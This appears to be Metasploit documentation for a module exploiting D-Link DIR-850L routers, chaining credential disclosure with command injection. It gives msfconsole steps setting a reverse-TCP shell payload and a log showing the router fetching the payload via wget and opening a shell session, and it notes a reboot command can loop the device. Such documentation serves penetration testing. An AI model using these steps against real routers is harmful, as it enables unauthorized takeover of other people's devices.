metasploit-gs/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md

The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands via an authenticated OS command injection vulneralbility. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 are potentially vulnerable. The vulneralbility seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be reboot will force the router into an infinite loop.

Vulnerable Application

1. Start msfconsole
2. Do : use exploit/linux/http/dlink_dir850l_unauth_exec.rb
3. Do : set RHOST [RouterIP]
4. Do : set PAYLOAD linux/mipsle/shell/reverse_tcp
5. Do : run
6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session

Example

msf > use exploit/linux/http/dlink_850l_unauth_exec
msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
RHOST => 192.168.0.14
msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
RPORT => 80
msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3
LHOST => ens3
msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
LPORT => 1351
msf exploit(dlink_850l_unauthenticated_exec) > run

[*] Started reverse TCP handler on 192.168.0.11:1351
[*] 192.168.0.14:80 - Initiating exploitation...
[*] Using URL: http://0.0.0.0:80/Muw2WNUEmsAlcdl
[*] Local IP: http://192.168.0.11:80/Muw2WNUEmsAlcdl
[*] 192.168.0.14:80 - Retrieving uid and auth challenge...
[*] Command Stager progress - 100.00% done (101/101 bytes)
[*] Client 192.168.0.14 (Wget) requested /Muw2WNUEmsAlcdl
[*] Sending payload to 192.168.0.14 (Wget)
[*] Command shell session 2 opened (192.168.0.11:1351 -> 192.168.0.14:55167) at 2017-11-02 15:37:06 -0400
[*] Server stopped.